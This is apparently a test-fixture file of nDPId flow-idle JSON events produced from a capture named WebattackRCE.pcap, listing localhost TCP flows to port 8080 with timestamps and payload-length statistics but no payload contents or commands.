-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 